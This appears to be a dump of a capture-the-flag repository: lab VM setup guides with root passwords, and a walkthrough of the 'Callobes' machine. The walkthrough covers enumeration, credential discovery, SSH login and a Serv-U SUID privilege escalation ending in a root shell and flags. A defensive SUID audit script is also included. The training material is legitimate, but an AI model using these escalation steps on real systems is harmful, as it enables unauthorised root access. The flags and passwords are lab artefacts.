--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/admin-access-denied.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/admin-create-new-product.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/admin-create-new-product.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/admin-panel-landing.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/admin-panel-landing.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/burp-intercept-newproduct.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/burp-intercept-newproduct.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/discovering-sql-error.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/discovering-sql-error.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/file-upload-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/file-upload-1.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/file-upload-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/file-upload-2.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/file-upload-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/file-upload-3.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/git-gitserver-staging.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/git-gitserver-staging.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/git-ls-la.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/git-ls-la.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/git-pipeline-staging.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/git-pipeline-staging.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/jenkins-app-dashboard.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/jenkins-app-dashboard.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/jenkins-build.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/jenkins-build.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/jenkins-dashboard.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/jenkins-dashboard.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/jenkins-landing.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/jenkins-landing.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/jenkins-login-screen.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/jenkins-login-screen.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/jwt-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/jwt-1.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/jwt-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/jwt-2.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/jwt-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/jwt-3.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/main-landing.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/main-landing.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/main-login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/main-login.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/make-admin-added-new-admin.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/make-admin-added-new-admin.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/prod-web-root.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/prod-web-root.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/registration-test.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/registration-test.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/shell-as-postgres.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/shell-as-postgres.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/source-code-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/source-code-1.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/sql-0-intercept.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/sql-0-intercept.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/sql-1-create-table.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/sql-1-create-table.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/sql-2-rce.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/sql-2-rce.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Bytescribe/README.md:
--------------------------------------------------------------------------------
1 | # Setup
2 |
3 | 1. Use the installation link to download the .ova file.
4 | 2. Import the image file to VMware using File -> Open
5 |
6 | 
7 |
8 | > [!WARNING]
9 | > The images are not supported by virtualbox.
10 |
11 | 3. Choose a Virtual Machine name and location for the new VM.
12 | 4. The default Network Interface is configured as NAT. If it is not, set it to NAT.
13 | 5. You can find the IP address of the machine using arp-scan on your Kali machine.
14 | ```
15 | ┌──(kali㉿kali)-[~]
16 | └─$ sudo arp-scan -l
17 | Interface: eth0, type: EN10MB, MAC: 00:0c:29:f7:91:2b, IPv4: 192.168.163.133
18 | Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
19 | 192.168.163.1 00:50:56:c0:00:08 VMware, Inc.
20 | 192.168.163.2 00:50:56:e9:26:ad VMware, Inc.
21 | 192.168.163.135 00:0c:29:15:64:ff VMware, Inc.
22 | 192.168.163.254 00:50:56:fb:dd:06 VMware, Inc.
23 |
24 | 4 packets received by filter, 0 packets dropped by kernel
25 | Ending arp-scan 1.10.0: 256 hosts scanned in 2.018 seconds (126.86 hosts/sec). 4 responded
26 |
27 | ┌──(kali㉿kali)-[~]
28 | └─$ ssh root@192.168.163.135
29 | The authenticity of host '192.168.163.135 (192.168.163.135)' can't be established.
30 | ED25519 key fingerprint is SHA256:FgEM7djbdkf6qtvyLOr4TPV35vMzjmXSJ09Cm8VHB8k.
31 | This key is not known by any other names.
32 | Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
33 | Warning: Permanently added '192.168.163.135' (ED25519) to the list of known hosts.
34 | root@192.168.163.135's password:
35 | Permission denied, please try again.
36 | root@192.168.163.135's password:
37 | Permission denied, please try again.
38 | root@192.168.163.135's password:
39 | Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 6.2.0-33-generic x86_64)
40 |
41 | * Documentation: https://help.ubuntu.com
42 | * Management: https://landscape.canonical.com
43 | * Support: https://ubuntu.com/advantage
44 |
45 | Expanded Security Maintenance for Applications is not enabled.
46 |
47 | 28 updates can be applied immediately.
48 | 27 of these updates are standard security updates.
49 | To see these additional updates run: apt list --upgradable
50 |
51 | Enable ESM Apps to receive additional future security updates.
52 | See https://ubuntu.com/esm or run: sudo pro status
53 |
54 | Last login: Thu Sep 14 21:15:45 2023 from 10.1.3.1
55 | root@bytescribe-virtual-machine:~#
56 |
57 | ```
58 | 6. If something goes wrong, use the credentials provided below to access the machine.
59 |
60 | # Credentials
61 | ```
62 | root:qpWO10@(
63 | ```
64 |
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Bytescribe/Screenshots/Screenshot-2023-10-06-024100.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Bytescribe/Screenshots/Screenshot-2023-10-06-024100.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Bytescribe/Screenshots/Screenshot-2023-10-06-035333.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Bytescribe/Screenshots/Screenshot-2023-10-06-035333.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Callobes/README.md:
--------------------------------------------------------------------------------
1 | # Setup
2 |
3 | 1. Use the installation link to download the .ova file.
4 | 2. Import the image file to VMware using File -> Open
5 |
6 | 
7 |
8 | > [!WARNING]
9 | > The images are not supported by virtualbox.
10 |
11 | 3. Choose a Virtual Machine name and location for the new VM.
12 | 4. The default Network Interface is configured as NAT. If it is not, set it to NAT.
13 | 5. You can find the IP address of the machine using arp-scan on your Kali machine.
14 | ```
15 | ┌──(kali㉿kali)-[~]
16 | └─$ sudo arp-scan -l
17 | Interface: eth0, type: EN10MB, MAC: 00:0c:29:2e:e5:cf, IPv4: 192.168.121.128
18 | Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
19 | 192.168.121.1 00:50:56:c0:00:08 VMware, Inc.
20 | 192.168.121.2 00:50:56:f2:3b:82 VMware, Inc.
21 | 192.168.121.129 00:0c:29:c7:d8:5e VMware, Inc.
22 | 192.168.121.254 00:50:56:e4:f5:4c VMware, Inc.
23 |
24 | 4 packets received by filter, 0 packets dropped by kernel
25 | Ending arp-scan 1.9.8: 256 hosts scanned in 2.050 seconds (124.88 hosts/sec). 4 responded
26 |
27 | ┌──(kali㉿kali)-[~]
28 | └─$ ssh root@192.168.121.129
29 | root@192.168.121.129's password:
30 | Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-53-generic x86_64)
31 |
32 | * Documentation: https://help.ubuntu.com
33 | * Management: https://landscape.canonical.com
34 | * Support: https://ubuntu.com/advantage
35 |
36 | * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
37 | just raised the bar for easy, resilient and secure K8s cluster deployment.
38 |
39 | https://ubuntu.com/engage/secure-kubernetes-at-the-edge
40 |
41 | * Canonical Livepatch is available for installation.
42 | - Reduce system reboots and improve kernel security. Activate at:
43 | https://ubuntu.com/livepatch
44 |
45 | 74 packages can be updated.
46 | 28 updates are security updates.
47 |
48 | New release '20.04.6 LTS' available.
49 | Run 'do-release-upgrade' to upgrade to it.
50 |
51 | Your Hardware Enablement Stack (HWE) is supported until April 2023.
52 | Last login: Fri Oct 6 04:20:37 2023 from 192.168.121.128
53 | root@shimishao:~#
54 | ```
55 |
56 |
57 | 6. If something goes wrong, use the credentials provided below to access the machine.
58 |
59 | # Credentials
60 | ```
61 | root:1qaSDFgtr
62 | ```
63 |
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Callobes/Screenshots/image-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Callobes/Screenshots/image-1.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Callobes/Screenshots/image-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Callobes/Screenshots/image-2.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Callobes/Screenshots/image-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Callobes/Screenshots/image-3.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Callobes/Screenshots/image-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Callobes/Screenshots/image-4.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Callobes/Screenshots/image-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Callobes/Screenshots/image-5.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Callobes/Screenshots/image-6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Callobes/Screenshots/image-6.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Callobes/Screenshots/image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Callobes/Screenshots/image.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Callobes/Walkthrough.md:
--------------------------------------------------------------------------------
1 | # Callobes
2 |
3 | This machine is taken from [Vulnhub](https://www.vulnhub.com/entry/election-1,503/) to support the idea of open source! We intend to continue sharing our projects as open source in the future.
4 |
5 | There are several ways to exploit the machine, and we are currently sharing one method. You are encouraged to explore and discover other paths independently.
6 |
7 | ## High Level Overview
8 | "Callobes" is a Linux-based easy Capture The Flag (CTF) machine that presents an engaging and challenging cybersecurity scenario. Here's a brief overview:
9 | This machine runs both a web server and an SSH server. The web server has a path traversal vulnerability that exposes a crucial piece of information, specifically credentials, within a file.
10 | Upon gaining an initial foothold, you'll discover a setuid binary named "Serv-U". This binary is the key to escalating your privileges and potentially achieving root access on the system.
11 | "Callobes" promises to challenge your skills in web exploitation, Linux privilege escalation, and potentially other areas of cybersecurity, making it an exciting platform for honing your penetration testing abilities.
12 |
13 | ## Enumerating the target
14 | Run a full-range port scan to find all open ports.
15 |
16 | ```
17 | ┌──(kali㉿kali)-[~]
18 | └─$ nmap -p- 192.168.121.129
19 | Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-05 19:10 EDT
20 | Nmap scan report for 192.168.121.129
21 | Host is up (0.00028s latency).
22 | Not shown: 65533 closed tcp ports (conn-refused)
23 | PORT STATE SERVICE
24 | 22/tcp open ssh
25 | 80/tcp open http
26 |
27 | Nmap done: 1 IP address (1 host up) scanned in 2.93 seconds
28 |
29 | ```
30 | Nmap found two open TCP ports (22 and 80).
31 |
32 | Navigating to the IP address in a browser we see the following.
33 |
34 | 
35 |
36 | Let's run a directory brute-force with dirb:
37 | ```
38 | ┌──(kali㉿kali)-[~]
39 | └─$ dirb http://192.168.121.129
40 |
41 | -----------------
42 | DIRB v2.22
43 | By The Dark Raver
44 | -----------------
45 |
46 | START_TIME: Thu Oct 5 19:47:57 2023
47 | URL_BASE: http://192.168.121.129/
48 | WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
49 |
50 | -----------------
51 |
52 | GENERATED WORDS: 4612
53 |
54 | ---- Scanning URL: http://192.168.121.129/ ----
55 | + http://192.168.121.129/index.html (CODE:200|SIZE:10918)
56 | ==> DIRECTORY: http://192.168.121.129/javascript/
57 | + http://192.168.121.129/phpinfo.php (CODE:200|SIZE:95537)
58 | ==> DIRECTORY: http://192.168.121.129/phpmyadmin/
59 | + http://192.168.121.129/robots.txt (CODE:200|SIZE:31)
60 | + http://192.168.121.129/server-status (CODE:403|SIZE:280)
61 |
62 | ```
63 | dirb found an index.html, a phpinfo.php, a phpmyadmin/ directory and a robots.txt file.
64 | The robots.txt file is the interesting one.
65 |
66 | First, navigate to the robots.txt file. It lists four entries, as seen below.
67 |
68 | 
69 |
70 | Only the shimishao directory is accessible.
71 |
72 | Run dirb again against the shimishao directory:
73 | ```
74 | ┌──(kali㉿kali)-[~]
75 | └─$ dirb http://192.168.121.129/shimishao
76 |
77 | -----------------
78 | DIRB v2.22
79 | By The Dark Raver
80 | -----------------
81 |
82 | START_TIME: Thu Oct 5 19:58:42 2023
83 | URL_BASE: http://192.168.121.129/shimishao/
84 | WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
85 |
86 | -----------------
87 |
88 | GENERATED WORDS: 4612
89 |
90 | ---- Scanning URL: http://192.168.121.129/shimishao/ ----
91 | ==> DIRECTORY: http://192.168.121.129/shimishao/admin/
92 | ==> DIRECTORY: http://192.168.121.129/shimishao/data/
93 | + http://192.168.121.129/shimishao/index.php (CODE:200|SIZE:6597)
94 | ==> DIRECTORY: http://192.168.121.129/shimishao/js/
95 | ==> DIRECTORY: http://192.168.121.129/shimishao/languages/
96 | ==> DIRECTORY: http://192.168.121.129/shimishao/lib/
97 | ==> DIRECTORY: http://192.168.121.129/shimishao/media/
98 | ==> DIRECTORY: http://192.168.121.129/shimishao/themes/
99 |
100 | ---- Entering directory: http://192.168.121.129/shimishao/admin/ ----
101 | ==> DIRECTORY: http://192.168.121.129/shimishao/admin/ajax/
102 | ==> DIRECTORY: http://192.168.121.129/shimishao/admin/components/
103 | ==> DIRECTORY: http://192.168.121.129/shimishao/admin/css/
104 | ==> DIRECTORY: http://192.168.121.129/shimishao/admin/img/
105 | ==> DIRECTORY: http://192.168.121.129/shimishao/admin/inc/
106 | + http://192.168.121.129/shimishao/admin/index.php (CODE:200|SIZE:8967)
107 | ==> DIRECTORY: http://192.168.121.129/shimishao/admin/js/
108 | ==> DIRECTORY: http://192.168.121.129/shimishao/admin/logs/
109 | ==> DIRECTORY: http://192.168.121.129/shimishao/admin/plugins/
110 |
111 | ```
112 | As seen above, there is a shimishao/admin/logs directory, which is useful for us.
113 | Let's try to access this directory directly:
114 |
115 | 
116 |
117 | We see a system.log file. Download it and see what it contains.
118 | 
119 |
120 | As seen above, the log gives us credentials for the Ubuntu user pred8or. Now we can use these credentials to log in over SSH.
121 |
122 | ```
123 | ┌──(kali㉿kali)-[~]
124 | └─$ ssh pred8or@192.168.121.129
125 | pred8or@192.168.121.129's password:
126 | Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-53-generic x86_64)
127 |
128 | * Documentation: https://help.ubuntu.com
129 | * Management: https://landscape.canonical.com
130 | * Support: https://ubuntu.com/advantage
131 |
132 | * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
133 | just raised the bar for easy, resilient and secure K8s cluster deployment.
134 |
135 | https://ubuntu.com/engage/secure-kubernetes-at-the-edge
136 |
137 | * Canonical Livepatch is available for installation.
138 | - Reduce system reboots and improve kernel security. Activate at:
139 | https://ubuntu.com/livepatch
140 |
141 | 74 packages can be updated.
142 | 28 updates are security updates.
143 |
144 | New release '20.04.6 LTS' available.
145 | Run 'do-release-upgrade' to upgrade to it.
146 |
147 | Your Hardware Enablement Stack (HWE) is supported until April 2023.
148 | Last login: Tue Oct 3 03:42:01 2023 from 192.168.163.1
149 | pred8or@shimishao:~$
150 | ```
151 |
152 | In the home directory we find the user1.txt file. Reading it with cat user1.txt gives us the first flag.
153 |
154 | ```
155 | pred8or@shimishao:~$ ls
156 | Desktop Documents Downloads Music Pictures Public Templates user1.txt Videos
157 | pred8or@shimishao:~$ cat user1.txt
158 | ICSD{66d74978b307889bea234a4bc6570a36}
159 |
160 | ```
161 |
162 | Privilege escalation is the process of going from lower permissions to higher permissions. This is done by exploiting vulnerabilities, design flaws or misconfigurations in applications. This step is very important.
163 |
164 | By using the following command you can enumerate all binaries having SUID permissions:
165 |
166 | ```
167 | find / -perm -u=s -type f 2>/dev/null
168 | ```
169 | ```
170 | pred8or@shimishao:/$ find / -perm -u=s -type f 2>/dev/null
171 | /usr/bin/arping
172 | /usr/bin/passwd
173 | /usr/bin/pkexec
174 | /usr/bin/traceroute6.iputils
175 | /usr/bin/newgrp
176 | /usr/bin/chsh
177 | /usr/bin/chfn
178 | /usr/bin/gpasswd
179 | /usr/bin/sudo
180 | /usr/sbin/pppd
181 | /usr/local/Serv-U/Serv-U
182 |
183 |
184 | ```
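A defender-side counterpart to the SUID enumeration above, added here as an example and not part of the original walkthrough: it feeds the same find output through an audit that flags SUID files missing from a baseline of distribution-shipped binaries (an assumed baseline built from the list above) or sitting under temporary or home directories, which is where the Serv-U exploit later drops its /tmp/sh.

```shell
#!/bin/sh
# Added example (not from the walkthrough or the Serv-U project): audit SUID
# binaries against a baseline and flag anything unexpected or badly located.

# Assumed baseline: the SUID binaries from the walkthrough's find output that
# ship with the distribution. Adjust it to the host's package manifest.
SUID_BASELINE='/usr/bin/arping
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/sbin/pppd'

# Constructed sample input: the walkthrough's find output plus the /tmp/sh
# that the Serv-U exploit leaves behind.
SAMPLE_SUID_LIST='/usr/bin/arping
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/sbin/pppd
/usr/local/Serv-U/Serv-U
/tmp/sh'

# audit_suid: read one SUID path per line from stdin and print one finding
# per line:
#   SUSPICIOUS <path>  lives under a temporary or home directory
#   UNEXPECTED <path>  is not in the baseline
# Baseline entries in expected locations produce no output.
audit_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        case "$path" in
            /tmp/*|/var/tmp/*|/dev/shm/*|/home/*)
                printf 'SUSPICIOUS %s\n' "$path"
                continue ;;
        esac
        if ! printf '%s\n' "$SUID_BASELINE" | grep -qxF -- "$path"; then
            printf 'UNEXPECTED %s\n' "$path"
        fi
    done
}

# scan_live_host: run the same find as the walkthrough on a real system and
# pass the result through the audit.
scan_live_host() {
    find / -perm -u=s -type f 2>/dev/null | audit_suid
}

# audit_sample: run the audit over the constructed sample list.
audit_sample() {
    printf '%s\n' "$SAMPLE_SUID_LIST" | audit_suid
}
```

On the walkthrough's host, audit_sample reports only /usr/local/Serv-U/Serv-U as UNEXPECTED and /tmp/sh as SUSPICIOUS; everything else matches the baseline.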
185 |
186 | The output of that command shows /usr/local/Serv-U/Serv-U with SUID (Set User ID) permissions. Let's google it and see what vulnerability we find.
187 |
188 | 
189 |
190 | On Exploit-DB we find "Serv-U FTP Server < 15.1.7 - Local Privilege Escalation", which applies to the vulnerable version installed here.
191 |
192 | https://www.exploit-db.com/exploits/47173
193 |
194 | Let's exploit it:
195 |
196 | We copy this bash script and run it in our home directory.
197 |
198 | ```
199 | pred8or@shimishao:~$ ls
200 | b.sh Desktop Documents Downloads Music Pictures Public Templates user1.txt Videos
201 | pred8or@shimishao:~$ bash b.sh
202 | [*] Launching Serv-U ...
203 | sh: 1: : Permission denied
204 | [+] Success:
205 | -rwsr-xr-x 1 root root 1113504 Oct 6 07:12 /tmp/sh
206 | [*] Launching root shell: /tmp/sh
207 | sh-4.4# whoami
208 | root
209 | sh-4.4# cd /root
210 | sh-4.4# ls
211 | root.txt
212 | sh-4.4# cat root.txt
213 | ICSD{45caa8f3afa6fc94aa3c039ceeeb7883}
214 | sh-4.4#
215 | ```
216 |
217 |
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/README.md:
--------------------------------------------------------------------------------
1 | # Setup
2 |
3 | 1. Use the installation link to download the .ova file.
4 | 2. Import the image file to VMware using File -> Open
5 |
6 | > [!WARNING]
7 | > The images are not supported by virtualbox.
8 |
9 | 3. Choose a Virtual Machine name and location for the new VM.
10 | 4. The default Network Interface is configured as NAT. If it is not, set it to NAT.
11 | 5. You can find the IP address of the machine using arp-scan on your Kali machine.
12 | ```
13 | ┌──(kali㉿kali)-[~/Captivity]
14 | └─$ sudo arp-scan -l
15 | Interface: eth0, type: EN10MB, MAC: 00:0c:29:ee:f4:ad, IPv4: 192.168.100.132
16 | Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
17 | 192.168.100.1 00:50:56:c0:00:08 VMware, Inc.
18 | 192.168.100.2 00:50:56:e5:ad:c6 VMware, Inc.
19 | 192.168.100.130 00:0c:29:94:0e:fd VMware, Inc.
20 | 192.168.100.254 00:50:56:fa:13:b9 VMware, Inc.
21 |
22 | 4 packets received by filter, 0 packets dropped by kernel
23 | Ending arp-scan 1.10.0: 256 hosts scanned in 2.303 seconds (111.16 hosts/sec). 4 responded
24 | ```
25 | 6. If something goes wrong, use the credentials provided below to access the machine.
26 |
27 | # Credentials
28 | ```
29 | Administrator:gnE4ZqIYDxX78uPek1Xo
30 | ```
31 |
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/Screenshots/80_landing.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/80_landing.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/Screenshots/bloodhound-analysis.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/bloodhound-analysis.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/Screenshots/bloodhound-login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/bloodhound-login.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/Screenshots/bloodhound-shortest-path-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/bloodhound-shortest-path-2.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/Screenshots/bloodhound-shortest-path.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/bloodhound-shortest-path.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-dashboard-2.png:
--------------------------------------------------------------------------------
